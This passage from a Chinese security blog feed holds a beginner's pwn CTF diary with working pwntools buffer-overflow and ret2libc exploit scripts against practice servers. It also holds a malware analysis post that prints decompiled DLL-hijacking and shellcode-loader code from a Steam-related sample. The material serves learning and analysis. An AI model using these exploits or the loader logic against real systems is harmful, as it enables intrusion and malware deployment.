class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> * </span><br><span class="line"></span><br><span class="line">context (os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>, log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = [<span class="string">&#x27;tmux&#x27;</span>,<span class="string">&#x27;splitw&#x27;</span>,<span class="string">&#x27;-h&#x27;</span>,<span class="string">&#x27;-l&#x27;</span>,<span class="string">&#x27;140&#x27;</span>]</span><br><span class="line"></span><br><span class="line">pwnfile = <span class="string">&#x27;./pwn90&#x27;</span></span><br><span class="line">elf = ELF(pwnfile)</span><br><span class="line"></span><br><span class="line"><span class="comment">#io = process(pwnfile)</span></span><br><span class="line">io = remote(<span class="string">&#x27;node4.anna.nssctf.cn&#x27;</span>,<span class="number">28497</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(io)</span></span><br><span class="line"></span><br><span class="line">pop_rdi = <span class="number">0x400733</span></span><br><span class="line">puts_plt = elf.sym[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_got = elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">main_addr = elf.sym[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line">pay = <span class="string">b&#x27;b&#x27;</span> * (<span class="number">0x20</span>+<span class="number">8</span>) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)</span><br><span class="line">io.sendafter(<span class="string">b&#x27;story!&#x27;</span>,pay)</span><br><span class="line"></span><br><span class="line">puts_addr = u64(io.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">libc_base = puts_addr - <span class="number">0x6f690</span></span><br><span class="line">system_addr = libc_base + <span class="number">0x45390</span></span><br><span class="line">bin_sh = libc_base + <span class="number">0x18cd57</span></span><br><span class="line">pay2 = <span class="string">b&#x27;b&#x27;</span> * (<span class="number">0x20</span>+<span class="number">8</span>) + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)</span><br><span class="line">io.recvuntil(<span class="string">&#x27;sword and tell me u story!&#x27;</span>)</span><br><span class="line">io.sendline(pay2)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">io.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure><h2 id="2024-12-21"><a href="#2024-12-21" class="headerlink" title="2024-12-21"></a>2024-12-21</h2><h3 id="rip"><a href="#rip" class="headerlink" title="rip"></a>rip</h3><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241221223350489.png" alt="image-20241221223350489"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> * </span><br><span class="line"></span><br><span class="line">context (os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>, log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">28867</span>)</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0xF</span>+<span class="number">0x8</span>)+p64(<span class="number">0x40118A</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="warmup-csaw-2016"><a href="#warmup-csaw-2016" class="headerlink" title="warmup_csaw_2016"></a>warmup_csaw_2016</h3><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241221223949389.png" alt="image-20241221223949389"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> * </span><br><span class="line"></span><br><span class="line">context (os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>, log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">25914</span>)</span><br><span class="line">backdoor = <span class="number">0x40060D</span></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x40</span>+<span class="number">0x8</span>)+p64(backdoor)</span><br><span class="line"></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure><h2 id="2024-12-22"><a href="#2024-12-22" class="headerlink" title="2024-12-22"></a>2024-12-22</h2><p>学了点基础知识</p><p><a href="https://xyy9233.github.io/2024/12/23/ruan-jian-an-quan/#%E5%AE%9E%E9%AA%8C%E4%BA%8C%EF%BC%9A%E5%9F%BA%E4%BA%8EUAF%E6%BC%8F%E6%B4%9E%E6%B3%84%E6%BC%8Fglibc%E5%9F%BA%E5%9C%B0%E5%9D%80%E5%AE%9E%E9%AA%8C">关于堆的一些小东西</a></p><h2 id="2024-12-24"><a href="#2024-12-24" class="headerlink" title="2024-12-24"></a>2024-12-24</h2><h3 id="HNCTF-2022-Week1-ezcmp"><a href="#HNCTF-2022-Week1-ezcmp" class="headerlink" title="[HNCTF 2022 Week1]ezcmp"></a>[HNCTF 2022 Week1]ezcmp</h3><p>不想和我说话，典型的IDA动调思维（x<br>断点断在read前面，直接读取buff值，拿出来：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&#x27;node5.anna.nssctf.cn&#x27;</span>,<span class="number">25530</span>)</span><br><span class="line">payload = <span class="string">&quot;\x72\x40\x0E\xDC\xAA\x78\x46\x14\xE2\xB0\x7E\x4C\x1A\xE8\xB6\x84\x52\x20\xEE\xBC\x8A\x58\x26\xF4\xC2\x90\x5E\x2C\xCB\xC8&quot;</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><p>当然gdb（</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241224143609848.png" alt="image-20241224143609848"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241224143547039.png" alt="image-20241224143547039"></p><h3 id="-1"><a href="#-1" class="headerlink" title="[?]???"></a>[?]???</h3><h2 id="2024-12-27"><a href="#2024-12-27" class="headerlink" title="2024-12-27"></a>2024-12-27</h2><h3 id="MoeCTF-2021-ret2text-ez"><a href="#MoeCTF-2021-ret2text-ez" class="headerlink" title="[MoeCTF 2021]ret2text_ez"></a>[MoeCTF 2021]ret2text_ez</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">&#x27;node5.anna.nssctf.cn&#x27;</span>,<span class="number">22826</span>)</span><br><span class="line">backdoor = <span class="number">0x0401196</span></span><br><span class="line">payload = <span class="string">b&#x27;A&#x27;</span>*(<span class="number">0x20</span>+<span class="number">0x8</span>)+p64(backdoor)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="GWCTF-2019-xxor"><a href="#GWCTF-2019-xxor" class="headerlink" title="[GWCTF 2019]xxor"></a>[GWCTF 2019]xxor</h3><h2 id="2025-1-3"><a href="#2025-1-3" class="headerlink" title="2025-1-3"></a>2025-1-3</h2><p>一直在写大作业们（狡辩）</p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;🥰pwn入门刷题日记&quot;&gt;&lt;a href=&quot;#🥰pwn入门刷题日记&quot; class=&quot;headerlink&quot; title=&quot;🥰pwn入门刷题日记~&quot;&gt;&lt;/a&gt;🥰pwn入门刷题日记~&lt;/h1&gt;&lt;h2 id=&quot;2024-11-29&quot;&gt;&lt;a href=&quot;#2024-</summary>
      
    
    
    
    
    <category term="刷题 Pwn" scheme="https://github.com/xyy9233/xyy9233.github.io.git/tags/%E5%88%B7%E9%A2%98-Pwn/"/>
    
  </entry>
  
  <entry>
    <title></title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2024/11/21/cuckoo-da-jian-yu-steamwork1-fen-xi-bao-gao/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2024/11/21/cuckoo-da-jian-yu-steamwork1-fen-xi-bao-gao/</id>
    <published>2024-11-21T06:03:17.516Z</published>
    <updated>2024-10-30T18:01:14.211Z</updated>
    
    <content type="html"><![CDATA[<h1 id="cuckoo搭建与-Steamwork1-简单分析报告"><a href="#cuckoo搭建与-Steamwork1-简单分析报告" class="headerlink" title="cuckoo搭建与[Steamwork1]简单分析报告"></a>cuckoo搭建与[Steamwork1]简单分析报告</h1><h2 id="cuckoo"><a href="#cuckoo" class="headerlink" title="cuckoo"></a>cuckoo</h2><p>cuckoo环境不难配置，但是似乎断断续续产生的小问题（下载错win7.iso“安装助手”文件和网络环境配置改来改去，也没忍住继续再读书）直到今天才成功运行！（好耶！）</p><p><a href="https://xyy9233.github.io/2024/10/30/%E9%85%8D%E7%BD%AEcuckoo%E8%B8%A9%E7%9A%84%E5%9D%91%E2%80%94%E2%80%94/">踩坑配置也整理了放在博客上</a></p><p>一直在pending，看来还得再修修：<br><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241030224001041.png" alt="image-20241030224001041"></p><p>等着也不是办法——</p><h2 id="Steamwork1"><a href="#Steamwork1" class="headerlink" title="Steamwork1"></a>Steamwork1</h2><h3 id="扔沙箱"><a href="#扔沙箱" class="headerlink" title="扔沙箱"></a>扔沙箱</h3><p>第一次这样实战分析一个恶意程序，有些手忙脚乱</p><p>直接扔到<a href="https://s.threatbook.com/report/file/eb4e7ea2ac57189f52720d7ed25773aa4d0fc894fcbea173c13b7c2eb08d05d6">微步沙箱</a>——和zip包里另一个文件后缀名(.vdf)对应了，确实是小红伞检测出异常<strong>（后面分析发现，其实并不是这样）</strong></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241030221825338.png" alt="image-20241030221825338"></p><p>看到编译时间戳和首次分析提交的时间，似乎在同一天？</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241030222048758.png" alt="image-20241030222048758"></p><p>签名者：Yuanyuan Pu</p><p>链接的网站只有这一个可以连通：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241030223233132.png" alt="image-20241030223233132"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241030223121852.png" alt="image-20241030222900731"></p><h3 id="小红伞的“ADWARE-CrossRider-Gen4”"><a href="#小红伞的“ADWARE-CrossRider-Gen4”" class="headerlink" title="小红伞的“ADWARE&#x2F;CrossRider.Gen4”"></a>小红伞的“ADWARE&#x2F;CrossRider.Gen4”</h3><p>去搜了搜小红伞报的这个：</p><blockquote><p> <code>ADWARE/CrossRider.Gen4</code> 是一种广告软件（adware），属于 <code>CrossRider</code> 家族。<code>CrossRider</code> 是一种较常见的广告软件平台，常用于分发弹出广告、劫持浏览器设置，或在网页上显示不请自来的广告。通常，它通过捆绑安装在其他免费软件中进入系统。</p><h3 id="具体行为和风险"><a href="#具体行为和风险" class="headerlink" title="具体行为和风险"></a>具体行为和风险</h3><ol><li><strong>广告投放</strong>：<code>CrossRider</code> 会在浏览器中显示广告，可能是弹出窗口、横幅广告或插入网页中的广告内容。</li><li><strong>劫持浏览器</strong>：它可能会更改浏览器的默认设置（如主页和搜索引擎），将流量重定向到特定网站，以便增加广告收入。</li><li><strong>跟踪用户行为</strong>：<code>CrossRider</code> 可能会收集用户的浏览习惯、点击记录等信息，这些数据可能会被发送到第三方服务器用于广告投放。</li></ol></blockquote><p>结合学长说淘宝这个事情，像是前几天轻轻摇一摇就跳转淘宝的事情</p><h3 id="IDA-尝试反编译"><a href="#IDA-尝试反编译" class="headerlink" title="IDA 尝试反编译"></a>IDA 尝试反编译</h3><h5 id="TODO-（qwq-vdf文件完全没看懂，也不知道该怎么看（该怎么上手呢（挠头"><a href="#TODO-（qwq-vdf文件完全没看懂，也不知道该怎么看（该怎么上手呢（挠头" class="headerlink" title="&#x2F;&#x2F;TODO: （qwq .vdf文件完全没看懂，也不知道该怎么看（该怎么上手呢（挠头"></a>&#x2F;&#x2F;TODO: （qwq .vdf文件完全没看懂，也不知道该怎么看（该怎么上手呢（挠头</h5><p>翻回来发现，localdata.vdf是恶意程序生成的，唉？但是如何分析这个呢，网上也没有找到相关的分析（？<br>怀疑是被加密的恶意shellcode，在程序调用或者满足什么条件解密启动。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241031011451784.png" alt="image-20241031011451784"></p><h4 id="借助chatGPT，看看程序都做了什么："><a href="#借助chatGPT，看看程序都做了什么：" class="headerlink" title="借助chatGPT，看看程序都做了什么："></a>借助chatGPT，看看程序都做了什么：</h4><h5 id="劫持DLL流，隐藏行为"><a href="#劫持DLL流，隐藏行为" class="headerlink" title="劫持DLL流，隐藏行为"></a>劫持DLL流，隐藏行为</h5><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241031012007483.png" alt="image-20241031012007483"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)</span><br><span class="line">&#123;</span><br><span class="line">  CHAR String1[<span class="number">260</span>]; // [esp+0h] [ebp-108h] BYREF - 用于存储路径字符串，长度为 <span class="number">260</span> 字节</span><br><span class="line"></span><br><span class="line">  // 当 fdwReason 为 <span class="number">1</span> 时，表示 DLL 被加载到进程中</span><br><span class="line">  <span class="keyword">if</span> ( fdwReason == <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    // 禁用线程调用通知，优化性能</span><br><span class="line">    DisableThreadLibraryCalls(hinstDLL);</span><br><span class="line"></span><br><span class="line">    // 检查是否存在名为 <span class="string">&quot;SteamUI.dll&quot;</span> 的模块，如果存在则继续执行</span><br><span class="line">    <span class="keyword">if</span> ( GetModuleHandleA(<span class="string">&quot;SteamUI.dll&quot;</span>) )</span><br><span class="line">    &#123;</span><br><span class="line">      // 调用自定义函数，功能不明确</span><br><span class="line">      sub_10001000();</span><br><span class="line"></span><br><span class="line">      // 拼接路径 <span class="string">&quot;C:\\Windows\\System32\\hid.dll&quot;</span> 到 String1</span><br><span class="line">      lstrcatA(String1, <span class="string">&quot;C:\\Windows\\System32\\hid.dll&quot;</span>);</span><br><span class="line"></span><br><span class="line">      // 检查拼接后的路径是否存在</span><br><span class="line">      <span class="keyword">if</span> ( GetFileAttributesA(String1) != -<span class="number">1</span> )</span><br><span class="line">      &#123;</span><br><span class="line">LABEL_6:</span><br><span class="line">        // 加载指定路径的 DLL，使用 LOAD_WITH_ALTERED_SEARCH_PATH 标志</span><br><span class="line">        LoadLibraryExA(String1, <span class="number">0</span>, 8u);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">1</span>; // 返回 <span class="number">1</span> 表示成功</span><br><span class="line">      &#125;</span><br><span class="line"></span><br><span class="line">      // 如果上述路径不存在，则尝试获取 Windows 目录路径</span><br><span class="line">      <span class="keyword">if</span> ( GetWindowsDirectoryA(String1, 0x104u) )</span><br><span class="line">      &#123;</span><br><span class="line">        // 拼接 <span class="string">&quot;\\System32\\hid.dll&quot;</span> 到 Windows 目录路径后</span><br><span class="line">        lstrcatA(String1, <span class="string">&quot;\\System32\\hid.dll&quot;</span>);</span><br><span class="line">        goto LABEL_6; // 跳转到加载 DLL 的步骤</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">1</span>; // 默认返回 <span class="number">1</span> 表示 DLL 加载成功</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li>该代码是一个 DLL 的入口函数 DllMain，当 DLL 被加载时会执行相应逻辑。</li><li>在加载时，如果检测到 “SteamUI.dll” 已存在，则尝试加载 “hid.dll” 文件。</li><li>首先尝试从 “C:\Windows\System32” 目录加载，如果失败，则尝试使用 Windows 系统目录路径。</li><li><strong>整个过程可能与 DLL 劫持有关，通过加载系统 DLL，代码可能在做某种劫持行为。</strong></li></ul><h5 id="解密shellcode并运行"><a href="#解密shellcode并运行" class="headerlink" title="解密shellcode并运行"></a>解密shellcode并运行</h5><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241031012314307.png" alt="image-20241031012314307"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241031012708386.png" alt="image-20241031012708386"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br><span class="line">301</span><br><span class="line">302</span><br><span class="line">303</span><br><span class="line">304</span><br><span class="line">305</span><br><span class="line">306</span><br><span class="line">307</span><br><span class="line">308</span><br><span class="line">309</span><br><span class="line">310</span><br><span class="line">311</span><br><span class="line">312</span><br><span class="line">313</span><br><span class="line">314</span><br><span class="line">315</span><br><span class="line">316</span><br><span class="line">317</span><br><span class="line">318</span><br><span class="line">319</span><br><span class="line">320</span><br><span class="line">321</span><br><span class="line">322</span><br><span class="line">323</span><br><span class="line">324</span><br><span class="line">325</span><br><span class="line">326</span><br><span class="line">327</span><br><span class="line">328</span><br><span class="line">329</span><br><span class="line">330</span><br><span class="line">331</span><br><span class="line">332</span><br><span class="line">333</span><br><span class="line">334</span><br><span class="line">335</span><br><span class="line">336</span><br><span class="line">337</span><br><span class="line">338</span><br><span class="line">339</span><br><span class="line">340</span><br><span class="line">341</span><br><span class="line">342</span><br><span class="line">343</span><br><span class="line">344</span><br><span class="line">345</span><br><span class="line">346</span><br><span class="line">347</span><br><span class="line">348</span><br><span class="line">349</span><br><span class="line">350</span><br><span class="line">351</span><br><span class="line">352</span><br><span class="line">353</span><br><span class="line">354</span><br><span class="line">355</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">int</span> sub_10001000()</span><br><span class="line">&#123;</span><br><span class="line">    // 获取模块句柄</span><br><span class="line">    HMODULE ModuleHandleA = GetModuleHandleA(<span class="string">&quot;kernel32.dll&quot;</span>);</span><br><span class="line">    HMODULE v1 = GetModuleHandleA(<span class="string">&quot;user32.dll&quot;</span>);</span><br><span class="line"></span><br><span class="line">    // 获取函数地址</span><br><span class="line">    FARPROC (__stdcall *GetProcAddress)(HMODULE, LPCSTR) = (FARPROC (__stdcall *)(HMODULE, LPCSTR))::GetProcAddress(ModuleHandleA, <span class="string">&quot;GetProcAddress&quot;</span>);</span><br><span class="line">    LPVOID (__stdcall *VirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD) = (LPVOID (__stdcall *)(LPVOID, SIZE_T, DWORD, DWORD))::GetProcAddress(ModuleHandleA, <span class="string">&quot;VirtualAlloc&quot;</span>);</span><br><span class="line">    BOOL (__stdcall *VirtualFree)(LPVOID, SIZE_T, DWORD) = (BOOL (__stdcall *)(LPVOID, SIZE_T, DWORD))::GetProcAddress(ModuleHandleA, <span class="string">&quot;VirtualFree&quot;</span>);</span><br><span class="line">    ::GetProcAddress(v1, <span class="string">&quot;MessageBoxA&quot;</span>);</span><br><span class="line">    HANDLE (__stdcall *CreateFileA)(LPCSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE) = (HANDLE (__stdcall *)(LPCSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE))::GetProcAddress(ModuleHandleA, <span class="string">&quot;CreateFileA&quot;</span>);</span><br><span class="line">    BOOL (__stdcall *ReadFile)(HANDLE, LPVOID, DWORD, LPDWORD, LPOVERLAPPED) = (BOOL (__stdcall *)(HANDLE, LPVOID, DWORD, LPDWORD, LPOVERLAPPED))::GetProcAddress(ModuleHandleA, <span class="string">&quot;ReadFile&quot;</span>);</span><br><span class="line">    BOOL (__stdcall *CloseHandle)(HANDLE) = (BOOL (__stdcall *)(HANDLE))::GetProcAddress(ModuleHandleA, <span class="string">&quot;CloseHandle&quot;</span>);</span><br><span class="line">    DWORD (__stdcall *GetFileSize)(HANDLE, LPDWORD) = (DWORD (__stdcall *)(HANDLE, LPDWORD))::GetProcAddress(ModuleHandleA, <span class="string">&quot;GetFileSize&quot;</span>);</span><br><span class="line"></span><br><span class="line">    // 初始化文件名缓冲区</span><br><span class="line">    memset(FileName, <span class="number">0</span>, 0x104u);</span><br><span class="line"></span><br><span class="line">    // 尝试获取 LOCALAPPDATA 环境变量</span><br><span class="line">    char *v3;</span><br><span class="line">    <span class="keyword">if</span> (getenv(<span class="string">&quot;LOCALAPPDATA&quot;</span>))</span><br><span class="line">    &#123;</span><br><span class="line">        v3 = getenv(<span class="string">&quot;LOCALAPPDATA&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        // 如果无法获取 LOCALAPPDATA，尝试获取用户目录</span><br><span class="line">        pcbBuffer = <span class="number">260</span>;</span><br><span class="line">        <span class="keyword">if</span> 